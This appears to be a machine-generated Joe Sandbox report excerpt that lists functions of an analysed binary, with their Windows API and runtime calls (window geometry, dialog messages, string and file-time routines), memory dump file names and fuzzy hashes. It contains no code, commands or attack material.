Instruction Fuzzy Hash: 50A1047191070A9FCB18DF24C9857AEBBBAEF60314F20C51DE52A9B6D2D770EA50CB50

Function 00219F25 Relevance: 6.3, APIs: 4, Instructions: 252keyboardCOMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 00219F75
GetKeyState.USER32(00000011), ref: 00219F7D

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

GetWindowRect.USER32(?,?), ref: 0021A12D
GetWindowRect.USER32(?,?), ref: 0021A17D

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$EmptyException@8H_prolog3StateThrow
String ID:
API String ID: 3036809859-0
Opcode ID: b2a1368cd446b3b16feddcb37dc0484d0657527a798bbd9f336729e2cc51f8db
Instruction ID: 0e6eba0308faacfcca9c0f907f03836a3a2a8f3c86cffdd562b4d13e659374e8
Opcode Fuzzy Hash: b2a1368cd446b3b16feddcb37dc0484d0657527a798bbd9f336729e2cc51f8db
Instruction Fuzzy Hash: 4FA12B71A1120AAFCB15DFA5C8849EEFBF9FFA8300F240469E945EB254DB319C91CB51

Function 001FAB35 Relevance: 6.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 001FAB78
CopyRect.USER32(?,?), ref: 001FAB83
GetClientRect.USER32(?,?), ref: 001FAB9C
SystemParametersInfoW.USER32(00000026,00000000,?,00000000), ref: 001FAD32

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$ClientCopyInfoParametersSystemWindow
String ID:
API String ID: 1264264222-0
Opcode ID: a3c0cd91e27d7d8c483dab4df563e03c3d05568543069c66ed690938eac4e2cd
Instruction ID: 2ac38f144945b98dce45084fe31101636cb19a4a3879dbd01bca5b990ca5cf89
Opcode Fuzzy Hash: a3c0cd91e27d7d8c483dab4df563e03c3d05568543069c66ed690938eac4e2cd
Instruction Fuzzy Hash: 0281F8B1D00619DFCB14DFA8C9889BEBBB5FF48700F518169E91AAB204DB34A945CB91

Function 0020C23C Relevance: 6.2, APIs: 4, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 0020C2D8
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 0020C31E
RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 0020C32E
IsWindowVisible.USER32(?), ref: 0020C3D3

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSendWindow$RedrawVisible
String ID:
API String ID: 2376333906-0
Opcode ID: a3ede0a585cb0ed0f652539bb1fb0954ac1b6273cfba5f59dc632bfa49ec1283
Instruction ID: c485df6ebfd4282485b3be70e6a444b60b3d59693e9fa0160917bda81714df4d
Opcode Fuzzy Hash: a3ede0a585cb0ed0f652539bb1fb0954ac1b6273cfba5f59dc632bfa49ec1283
Instruction Fuzzy Hash: 4A51A570220701AFC7219F64C889E6AB7B6FF85700B3446ADF54A8B6A2DB31EC51CB50

Function 0027539D Relevance: 6.2, APIs: 4, Instructions: 157COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 002753CF
SetRectEmpty.USER32(?), ref: 00275461
SetRect.USER32(?,0000000A,?,?), ref: 00275498
CopyRect.USER32(?,?), ref: 002754D1

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$CopyEmptyWindow
String ID:
API String ID: 2176940440-0
Opcode ID: b50d462ff7981a7254f4c11dc5263c70112f5a9bad2d763830fedf8a82aad4a1
Instruction ID: 988eb38c2d4eb5fbc4233cbdbff36d6dc92e1dcc772dbe8ee8d1d429990773f8
Opcode Fuzzy Hash: b50d462ff7981a7254f4c11dc5263c70112f5a9bad2d763830fedf8a82aad4a1
Instruction Fuzzy Hash: 315108B1D11629AFCB11DFA9D9948EEFBF9EF48700F10815AE409A7210D7B06E41CFA1

Function 00204BBE Relevance: 6.2, APIs: 4, Instructions: 155timeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00204BE1
GetFileTime.KERNEL32(?,?,?,?), ref: 00204C1F
GetFileSizeEx.KERNEL32(?,?), ref: 00204C37

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: File$SizeTime_memset
String ID:
API String ID: 151880914-0
Opcode ID: 2f8f45f03059d9d012a53556888bb30d86ff92d9a73f6460150814e5fd8645d2
Instruction ID: 95f2d3f6d93211ee6add554a0b020eb4b456604787b28863b1a64ffda9e99700
Opcode Fuzzy Hash: 2f8f45f03059d9d012a53556888bb30d86ff92d9a73f6460150814e5fd8645d2
Instruction Fuzzy Hash: DC515CB1910709AFC724EFA4D981DAAB7F8FF183107148A2EE567D7691E730E914CB50

Function 001CD992 Relevance: 6.1, APIs: 4, Instructions: 149COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001CD9AB
_wcslen.LIBCMT ref: 001CD9CD
_wcslen.LIBCMT ref: 001CDA0E
_wcslen.LIBCMT ref: 001CDAE3

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 191e8704ea0488ce00999f967bb9842e730ee8a537e8f92bc74045aaa9c31603
Instruction ID: 525f8dd5ad0bf0b6d3ea9f451bb8f448cbcfa756f6e03dda03b37580e0d0f2c4
Opcode Fuzzy Hash: 191e8704ea0488ce00999f967bb9842e730ee8a537e8f92bc74045aaa9c31603
Instruction Fuzzy Hash: 34518C76D04219EFCF15DFA8D880AEEB7B4EF58354B21446AE805B7201DB30EE41CB90

Function 001DC592 Relevance: 6.1, APIs: 4, Instructions: 132windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001DC599
SendDlgItemMessageA.USER32(?,?,?,00000000,?), ref: 001DC6E5

Part of subcall function 001C8E6A: _malloc.LIBCMT ref: 001C8E88

SendDlgItemMessageW.USER32(?,?,0000040B,00000000,00000001), ref: 001DC671

Part of subcall function 00205BA3: __EH_prolog3.LIBCMT ref: 00205BAA

SendDlgItemMessageW.USER32(?,?,0000037C,?,?), ref: 001DC6A3

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ItemMessageSend$H_prolog3$_malloc
String ID:
API String ID: 2480034192-0
Opcode ID: d019a74fdf770443f219c6de43685247275236c31c9dccb200bac61a9e5e06ab
Instruction ID: 7d6ba2c274df8b4c4be0324fc1c11dbee1a28ace7464abbfacf86daf5782aca9
Opcode Fuzzy Hash: d019a74fdf770443f219c6de43685247275236c31c9dccb200bac61a9e5e06ab
Instruction Fuzzy Hash: 6141C0B1900106ABDF259F64DC44ABE76B5FF50320F504A1AF965AA3D1DB308E41DB90

Function 002BD627 Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002BD6C2
__flush.LIBCMT ref: 002BD6E0
__write.LIBCMT ref: 002BD707
__flsbuf.LIBCMT ref: 002BD732

Part of subcall function 002BE629: __getptd_noexit.LIBCMT ref: 002BE629

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 9fb5eafde9ac0169d79dbd6bd5820b39befd159722b1eca9078c5386278874eb
Instruction ID: 3df196c1d2c5d68a94ab546a6dbff5bc28a778d47a99676bb664484b759ea65b
Opcode Fuzzy Hash: 9fb5eafde9ac0169d79dbd6bd5820b39befd159722b1eca9078c5386278874eb
Instruction Fuzzy Hash: 5E41C831A207059BDF249FA59884ADFBBB9AF90390F28862DD41997150FB70ED60DF40

Function 002147B7 Relevance: 6.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 002147BE

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

Part of subcall function 001CBB21: __EH_prolog3_catch.LIBCMT ref: 001CBB28

GetWindowRect.USER32(?,?), ref: 002148B2
GetSystemMetrics.USER32(00000010), ref: 002148C0
GetSystemMetrics.USER32(00000011), ref: 002148CB

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: MetricsSystem$Exception@8H_prolog3H_prolog3_H_prolog3_catchRectThrowWindow
String ID:
API String ID: 3575448974-0
Opcode ID: da32130dc241b86dba400f47bcf5b8bcdf385f8cb5fa4bb95351ed2a44a43ce1
Instruction ID: b5fc87f2dd130993bce9e9cfe67975c05ff17dad68c499fe84f50bdb7fa9f09d
Opcode Fuzzy Hash: da32130dc241b86dba400f47bcf5b8bcdf385f8cb5fa4bb95351ed2a44a43ce1
Instruction Fuzzy Hash: D8415871A006199FCB04EFA4C895AEEBBF5FF58300F154469F94AAB291CB70A941CF50

Function 0020C592 Relevance: 6.1, APIs: 4, Instructions: 120COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 0020C652
SetRectEmpty.USER32(?), ref: 0020C65F
SetRectEmpty.USER32(?), ref: 0020C70D
SetRectEmpty.USER32 ref: 0020C76A

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRect
String ID:
API String ID: 2270935405-0
Opcode ID: 9399b382d9962ed81cc65db2dde788c9448939df611c29381161018ebd02d223
Instruction ID: 8cab308916ce181e283c9b4be732f2434437d8003f5cb70829a86321f318a59f
Opcode Fuzzy Hash: 9399b382d9962ed81cc65db2dde788c9448939df611c29381161018ebd02d223
Instruction Fuzzy Hash: 99519EB1815B858EC360DF3AC5816E7FAE9BFA4314F104A2FD0EED2261DBB065818F51

Function 001E2596 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 001E2662
ClientToScreen.USER32(?,?), ref: 001E2672
IsWindow.USER32(?), ref: 001E2694
ClientToScreen.USER32(?,?), ref: 001E26C9

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClientScreenWindow
String ID:
API String ID: 1643562046-0
Opcode ID: f80358801e2eef1af9e9e07792a58beaa27945b17854569246b367804348e552
Instruction ID: bf6050bc866e7f723c8aaea7c64ba2c5b5abed5a23556e2749458fa76a917962
Opcode Fuzzy Hash: f80358801e2eef1af9e9e07792a58beaa27945b17854569246b367804348e552
Instruction Fuzzy Hash: D141CC71500A40AADF249F56CCA0ABE7BF9EF1C300F24492AE98AD2161EB31DD90DB10

Function 001E1BC7 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 001E1C93
ClientToScreen.USER32(?,?), ref: 001E1CA3
IsWindow.USER32(?), ref: 001E1CC5
ClientToScreen.USER32(?,?), ref: 001E1CFA

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClientScreenWindow
String ID:
API String ID: 1643562046-0
Opcode ID: e67157617c764d6422848c730245c940a928572c096b9933ca93657811f385c4
Instruction ID: ca0c1cf51329030c48601760663f2bcc2c713cca9ae66f0d91d0a013fa52ec13
Opcode Fuzzy Hash: e67157617c764d6422848c730245c940a928572c096b9933ca93657811f385c4
Instruction Fuzzy Hash: 8F41BC71540A84FAEB249F96CD84EBE77F9EF18340F304429EA8AC6160EB31DD91CB50

Function 002D083C Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 002D0870
__isleadbyte_l.LIBCMT ref: 002D08A3
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,?,?,00000000,?,?,?), ref: 002D08D4
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000,?,?,?), ref: 002D0942

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 05b8ccbd1018b47817dbe67d6d155d643a4d7adf38a1b64e0d96ff5706034cbb
Instruction ID: 7f4ae0e0af0ef882a2f01d75bc65a6e38cb028c38577a70d597d31d5532abf82
Opcode Fuzzy Hash: 05b8ccbd1018b47817dbe67d6d155d643a4d7adf38a1b64e0d96ff5706034cbb
Instruction Fuzzy Hash: C131BF31A20286EFDB10DFA4C8D4BAE3BA5AF01310F1585AAE451CB2A1D730DD60EB90

Function 002087A3 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 002087AD
GetDlgCtrlID.USER32(?), ref: 00208816

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,00000050,00000000,00000000,00000000,0000020C,0020B1BA,?,?,?), ref: 00208877
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 002088AC

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ByteCharCtrlException@8H_prolog3H_prolog3_MultiThrowWideWindow
String ID:
API String ID: 1933732581-0
Opcode ID: a72aa23bd56f16ccf6d9675448efcf7ff8b75d7e0fc4462d74f5c0d2153583ba
Instruction ID: 21f72f16ff852b6e92ed7e4ac31f1973e675dc258502f6982df6e26c24f93ac2
Opcode Fuzzy Hash: a72aa23bd56f16ccf6d9675448efcf7ff8b75d7e0fc4462d74f5c0d2153583ba
Instruction Fuzzy Hash: 9131043059030957CF21AB708C89FEF7368AF70710F50465CF6A6A61D2DF309D908A21

Function 0021B4C0 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 0021B4E9
GetWindowRect.USER32(?,?), ref: 0021B520
GetClientRect.USER32(?,?), ref: 0021B53E

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$ClientEmptyWindow
String ID:
API String ID: 742297903-0
Opcode ID: 804e7314d271d84f1c2618944b4be68566560f9c5a74aad7518e0ac03cd91040
Instruction ID: fa4c836a4a9e005803ef6d2cf6d3ad2e5033bf2ee820c95b618ae6ca40cb7b56
Opcode Fuzzy Hash: 804e7314d271d84f1c2618944b4be68566560f9c5a74aad7518e0ac03cd91040
Instruction Fuzzy Hash: C8311AB161010AEFCB05DF68D984AA9B7F9FF59304B508569E41ADB251DB30ED50CF90

Function 00275637 Relevance: 6.1, APIs: 4, Instructions: 92COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 0027568D
IsRectEmpty.USER32(?), ref: 00275697
SetRectEmpty.USER32(?), ref: 002756EE
SetRectEmpty.USER32(?), ref: 002756F4

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRect
String ID:
API String ID: 2270935405-0
Opcode ID: 06eb99db7b490d945d042bf01b55bc9900f0e2220910c77f35b9a17428c67433
Instruction ID: 38577e348ffa4fef31b3909df0c92d63c513909fa28d6701f1b6b953d57bfbf8
Opcode Fuzzy Hash: 06eb99db7b490d945d042bf01b55bc9900f0e2220910c77f35b9a17428c67433
Instruction Fuzzy Hash: A331AF71910629DBCF11DFA9C8C099EF7FCEF48710B60846AE909AB106D7B19D51CF91

